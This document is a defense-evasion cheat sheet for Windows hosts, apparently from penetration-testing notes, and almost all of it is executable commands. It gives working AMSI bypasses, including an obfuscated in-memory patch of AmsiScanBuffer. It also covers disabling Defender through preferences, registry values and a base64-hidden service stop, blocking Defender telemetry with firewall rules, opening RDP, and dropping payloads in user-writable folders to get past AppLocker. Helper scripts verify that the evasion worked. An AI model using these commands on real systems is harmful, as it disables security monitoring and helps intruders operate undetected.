Defense Evasion

The adversary is trying to avoid being detected. https://attack.mitre.org/tactics/TA0005/

Firewall Modification

Allowing RDP

PowerShell

Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -value 0
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

Windows Commands

reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh advfirewall firewall set rule group="remote administration" new enable=yes
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=domain
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=private
The legacy netsh firewall context below is deprecated in favour of netsh advfirewall firewall (newer Windows versions print a deprecation notice when it is used), so prefer the advfirewall forms above on current hosts:

netsh firewall add portopening TCP 3389 "Remote Desktop"
netsh firewall set service RemoteDesktop enable
netsh firewall set service RemoteDesktop enable profile=ALL
netsh firewall set service RemoteAdmin enable
sc config TermService start= auto
net start Termservice
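The same change wrapped so that it can be verified and undone, as an added example that is not part of the original page: it snapshots the settings it is about to touch, applies them, checks that TermService is actually listening on 3389 behind an enabled inbound rule, and hands the snapshot back for cleanup. The function names Enable-RdpAccess and Restore-RdpAccess are illustrative, not built-in cmdlets.

```powershell
# Added example (illustrative function names): enable RDP + firewall rules, verify, restore.
$TsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'

function Enable-RdpAccess {
    # Snapshot what is about to change so it can be put back afterwards.
    $state = @{
        fDenyTSConnections = (Get-ItemProperty $TsKey).fDenyTSConnections
        FirewallRules      = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' |
                               Select-Object Name, Enabled)
        TermServiceStart   = (Get-Service TermService).StartType
    }

    Set-ItemProperty $TsKey -Name fDenyTSConnections -Value 0
    Set-Service TermService -StartupType Automatic
    Start-Service TermService
    Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'

    # Verify rather than assume: a listener on 3389 and at least one enabled inbound rule.
    $listening = Get-NetTCPConnection -LocalPort 3389 -State Listen -ErrorAction SilentlyContinue
    $rules     = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -Enabled True `
                     -Direction Inbound -ErrorAction SilentlyContinue
    if (-not $listening) { Write-Warning 'TermService is not listening on TCP 3389' }
    if (-not $rules)     { Write-Warning 'No enabled inbound Remote Desktop firewall rule' }
    return $state
}

function Restore-RdpAccess($State) {
    Set-ItemProperty $TsKey -Name fDenyTSConnections -Value $State.fDenyTSConnections
    foreach ($r in $State.FirewallRules) {
        # Only disable rules that were disabled before we started.
        if ($r.Enabled -eq 'False') { Disable-NetFirewallRule -Name $r.Name }
    }
    Set-Service TermService -StartupType $State.TermServiceStart
}

# Usage:
# $saved = Enable-RdpAccess
# ... use RDP ...
# Restore-RdpAccess $saved
```

The restore step only disables rules that were disabled in the snapshot, so running it on a host where RDP was already open leaves that host as it was found.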

AMSI Bypasses

A classic resource: https://amsi.fail/ (generates freshly obfuscated variants, which matters because each published form is signatured within days). The two one-liners below flip AmsiUtils.amsiInitFailed through reflection (the second is an obfuscated rewrite of the first); the third patches AmsiScanBuffer in memory so every scan returns an error and nothing is flagged.

[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
SeT-Item ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}" -f 'F','rE' ) ) ; ( Get-varIABLE ( ('1Q'+'2U') +'zX' ) -VaL )."AssEmbly"."GETTYPe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."getfiElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sETVaLUE"( ${nULl},${tRuE} );
$fzxhw = @"
using System;
using System.Runtime.InteropServices;
public class fzxhw {
    [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr vilqbn, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $fzxhw
# "amsi.dll": the accented spelling is decomposed (Normalize("FormD")) and the combining marks stripped (-replace "\p{Mn}"),
# so the literal module name never appears in the script text that AMSI scans
$jvdnuxs = [fzxhw]::LoadLibrary("$(('ämsî'+'.dll').NORMALiZE([char](70)+[char](111)+[char](114)+[char](109)+[char](68)) -replace [char](92)+[char](112)+[char](123)+[char](77)+[char](110)+[char](125))")
# "AmsiScanBuffer" assembled from character codes for the same reason
$ikbtnz = [fzxhw]::GetProcAddress($jvdnuxs, "$([char](65)+[char](109)+[char](115)+[char](105)+[char](83)+[char](99)+[char](97)+[char](110)+[char](66)+[char](117)+[char](102)+[char](102)+[char](101)+[char](114))")
$p = 0
# make the first 6 bytes of AmsiScanBuffer writable (0x40 = PAGE_EXECUTE_READWRITE)
[fzxhw]::VirtualProtect($ikbtnz, [uint32]6, 0x40, [ref]$p)
# patch: mov eax, 0x80070057 (E_INVALIDARG); ret -- valid on both x86 and x64, so every scan "fails" and nothing is flagged
$ovsj = "0xB8"; $zahw = "0x57"; $cfuu = "0x00"; $ukxu = "0x07"; $salu = "0x80"; $yrkl = "0xC3"
$xrnun = [Byte[]] ($ovsj,$zahw,$cfuu,$ukxu,$salu,$yrkl)
[System.Runtime.InteropServices.Marshal]::Copy($xrnun, 0, $ikbtnz, 6)
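A way to confirm that a bypass actually took, as an added example that is not part of the original page: it feeds Microsoft's published AMSI test string (the AMSI equivalent of EICAR) to Invoke-Expression and reports whether the engine blocked it, and shows whether amsi.dll is even loaded in the current process. The function names are illustrative.

```powershell
# Added example (illustrative function names): is AMSI still scanning this process?
function Test-AmsiActive {
    # Microsoft's AMSI test string, split so this script is not itself flagged when loaded.
    $sample = 'AMSI Test Sample: ' + '7e72c3ce-861b-4339-8740-0ac1484c1386'
    try {
        # Invoke-Expression submits the text to AMSI as a new script block; a working
        # AMSI raises "This script contains malicious content and has been blocked by
        # your antivirus software" (a ParseException) before it runs.
        Invoke-Expression "'$sample'" | Out-Null
        return $false   # nothing blocked it: AMSI is bypassed, disabled, or absent
    } catch {
        return $true    # AMSI is active
    }
}

function Get-AmsiLoadState {
    # amsi.dll is loaded lazily; if it is absent nothing has been scanned in this process yet.
    $mod = (Get-Process -Id $PID).Modules | Where-Object ModuleName -eq 'amsi.dll'
    [pscustomobject]@{
        AmsiDllLoaded = [bool]$mod
        AmsiActive    = Test-AmsiActive
    }
}

# Usage: run before and after a bypass; AmsiActive should flip from True to False.
Get-AmsiLoadState
```

If AmsiActive stays True after one of the one-liners above, the one-liner itself was most likely signatured and blocked on load, which is the usual failure mode and the reason amsi.fail regenerates them.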

Microsoft Defender for Endpoint

Note: the Sense client queues telemetry locally while it cannot reach the cloud, so blocking its traffic (see "Blocking MS Defender Connections" below) only delays reporting: as soon as connectivity is restored, the whole backlog is uploaded.

Getting Current Status

Get-MpComputerStatus

Adding an Exclusion

Add-MpPreference -ExclusionPath 'C:\windows\temp'

Scanning a File with Defender

"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -DisableRemediation -File 'C:\stager.exe'

ScanType 3 is a custom scan of the given file and -DisableRemediation returns the verdict without quarantining it, which makes this a quick local detection check for a payload. The path contains a space and must be quoted. A hit is still recorded as a Defender detection event (and forwarded if the host is onboarded to MDE), so do not run it on a payload you expect to be caught.

Disabling Defender

taskkill  /F /IM MSASCuiL.exe

MSASCuiL.exe is only the notification-area UI; killing it hides the tray icon and leaves the engine untouched (MsMpEng.exe runs as a protected process and cannot be terminated from user mode, even as administrator). The preference changes below are rejected or silently reverted while Tamper Protection is on, so check (Get-MpComputerStatus).IsTamperProtected first.

Set-MpPreference -DisableIntrusionPreventionSystem $true `
-DisableRealtimeMonitoring $true -DisableScriptScanning $true `
-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode `
-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Registry equivalents. The two HKCU values and NotificationSuppress only hide the UI and notifications; DisableAntiSpyware is ignored by Defender platform 4.18.2007.8 (August 2020) and later on client devices, and the remaining policy values are subject to the same Tamper Protection caveat as Set-MpPreference.

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAHealth" /t REG_DWORD /d 0x1 /f
REG ADD "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d 0x1 /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 0x2 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v "NotificationSuppress" /t REG_DWORD /d 0x1 /f

Disable Defender on Reboot

A BlackByte TTP: the service name is carried as UTF-16LE base64 (it decodes to WinDefend), so the string never appears in the command line. Stopping or disabling WinDefend fails while Tamper Protection is enabled.

powershell -command "$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('VwBpA'+'G4ARAB'+'lAGYA'+'ZQB'+'uAG'+'QA'));Stop-Service -Name $x;Set-Service -StartupType Disabled $x"
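Because Tamper Protection makes most of the changes in this section fail silently, an added example (not from the original page) that snapshots Defender's effective state before and after a change and diffs the two, so a rejected change shows up as an empty diff. The function name Get-DefenderPosture is illustrative; every property it reads is a real Get-MpComputerStatus / Get-MpPreference field.

```powershell
# Added example (illustrative function name): verify that a Defender change actually took effect.
function Get-DefenderPosture {
    $s = Get-MpComputerStatus
    $p = Get-MpPreference
    [pscustomobject]@{
        TamperProtected      = $s.IsTamperProtected
        RealTimeProtection   = $s.RealTimeProtectionEnabled
        BehaviorMonitor      = $s.BehaviorMonitorEnabled
        IoavProtection       = $s.IoavProtectionEnabled
        AMService            = $s.AMServiceEnabled
        ScriptScanning       = -not $p.DisableScriptScanning
        MAPSReporting        = $p.MAPSReporting          # 0 = disabled
        SubmitSamplesConsent = $p.SubmitSamplesConsent   # 2 = never send
        ExclusionPaths       = @($p.ExclusionPath)       # empty for non-admins on recent builds
        WinDefendStartType   = (Get-Service WinDefend).StartType
    }
}

$before = Get-DefenderPosture
if ($before.TamperProtected) {
    Write-Warning 'Tamper Protection is on: Set-MpPreference, Stop-Service WinDefend and the policy registry values will not stick'
}

# ... apply a change here, e.g. Add-MpPreference -ExclusionPath 'C:\windows\temp' ...

$after = Get-DefenderPosture
# Flatten both snapshots to name=value strings and diff them; no output means nothing changed.
Compare-Object ($before.PSObject.Properties | ForEach-Object { "$($_.Name)=$($_.Value)" }) `
               ($after.PSObject.Properties  | ForEach-Object { "$($_.Name)=$($_.Value)" })
```

Reading the snapshot before touching anything is also the cheapest way to decide whether the section's techniques are worth attempting on a given host at all.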

Reviewing AppLocker Policies

$a = Get-ApplockerPolicy -effective; $a.rulecollections;

You can also read the AppLocker policy straight from the Registry (SrpV2 holds the rule XML per collection) and, while you are there, Defender's exclusion list (recent Defender builds restrict this key, like the exclusion output of Get-MpPreference, to administrators):

reg query "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2" /s
reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s

Blocking MS Defender Connections

The first rule cuts the WinDefend service (MsMpEng.exe) off from the cloud on 443, so cloud-delivered protection degrades to local signatures; the two program rules target the MDE sensor binaries. All three need local admin, and the caching caveat above applies: telemetry is queued, not lost.

New-NetFirewallRule -DisplayName "Block 443 MsMpEng" -Name "Block 443 MsMpEng" -Direction Outbound -Service WinDefend -Enabled True -RemotePort 443 -Protocol TCP -Action Block
New-NetFirewallRule -DisplayName "Block 443 SenseCncProxy" -Name "Block 443 SenseCncProxy" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" -RemotePort 443 -Protocol TCP -Action Block
New-NetFirewallRule -DisplayName "Block 443 MsSense" -Name "Block 443 MsSense" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe" -RemotePort 443 -Protocol TCP -Action Block

Default Writable Folders for Execution Control Bypass

Try putting your payload in one of the following directories. They are writable by standard users by default yet sit under %WINDIR%, which the default AppLocker rules allow wholesale, so a file dropped there passes a default path-rule policy (MachineKeys typically grants create/write but not delete, so whatever you drop there stays):

C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
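An added example (not part of the original page) that ties the AppLocker review above to the writable-folder list: it pulls the path rules out of the effective policy XML, shows which Allow rules cover %WINDIR%, and then tests the candidate folders by actually writing to them rather than reading ACLs. The function names are illustrative; the folder list is the one given above.

```powershell
# Added example (illustrative function names): AppLocker path rules vs. user-writable Windows folders.
function Get-AppLockerPathRules {
    # Effective policy as XML; RuleCollection/FilePathRule/Conditions/FilePathCondition@Path
    [xml]$policy = Get-AppLockerPolicy -Effective -Xml
    foreach ($coll in $policy.AppLockerPolicy.RuleCollection) {
        foreach ($rule in $coll.FilePathRule) {
            foreach ($cond in $rule.Conditions.FilePathCondition) {
                [pscustomobject]@{
                    Collection = $coll.Type            # Exe, Script, Msi, Dll, Appx
                    Mode       = $coll.EnforcementMode # Enabled / AuditOnly / NotConfigured
                    Action     = $rule.Action          # Allow / Deny
                    Path       = $cond.Path            # e.g. %WINDIR%\*
                    Name       = $rule.Name
                }
            }
        }
    }
}

function Test-WritableDirectory([string]$Path) {
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
    # Write for real: ACL inspection misses inherited and deny entries.
    try { [IO.File]::WriteAllText($probe, 'x') } catch { return $false }
    # Some of these folders allow create but not delete; report it instead of failing.
    try { Remove-Item -LiteralPath $probe -Force -ErrorAction Stop }
    catch { Write-Warning "wrote $probe but could not delete it (write-only ACL)" }
    return $true
}

$candidates = @(
    "$env:SystemRoot\System32\Microsoft\Crypto\RSA\MachineKeys",
    "$env:SystemRoot\System32\spool\drivers\color",
    "$env:SystemRoot\Tasks",
    "$env:SystemRoot\tracing"
)

# 1. Allow rules that cover the Windows directory (the default rule set allows %WINDIR%\*).
Get-AppLockerPathRules |
    Where-Object { $_.Action -eq 'Allow' -and $_.Path -like '%WINDIR%*' } |
    Format-Table Collection, Mode, Path, Name -AutoSize

# 2. Which candidate folders does the current user actually have write access to?
foreach ($dir in $candidates) {
    [pscustomobject]@{ Path = $dir; Writable = Test-WritableDirectory $dir }
}
```

The probe write leaves a file-creation and deletion trace, so on a closely monitored host run it once, not per payload. If step 1 shows no Allow rule for %WINDIR%, the policy is not a default one and a writable folder alone will not help.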

PowerShell Execution

Nested PowerShell Bypass

Spawn a second powershell.exe from the first with the real command line carried as an encoded command. -enc expects the base64 of the UTF-16LE (Unicode) bytes of the inner command line, not ASCII base64:

$inner = 'powershell.exe -w hidden -c "iex(...)"'
$enc   = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))
powershell.exe -enc $enc

Both process command lines remain visible to process-creation telemetry, and script block logging (event 4104) records the decoded content, so this hides the inner command from casual inspection only.

32-Bit PowerShell Bypass

PowerShell disabled for you? Blocks keyed to the System32 binary's path (AppLocker path rules, some EDR rules) often miss the 32-bit copy under SysWOW64, which exists only on 64-bit Windows. Try running it:

C:\windows\syswow64\windowspowershell\v1.0\powershell whoami
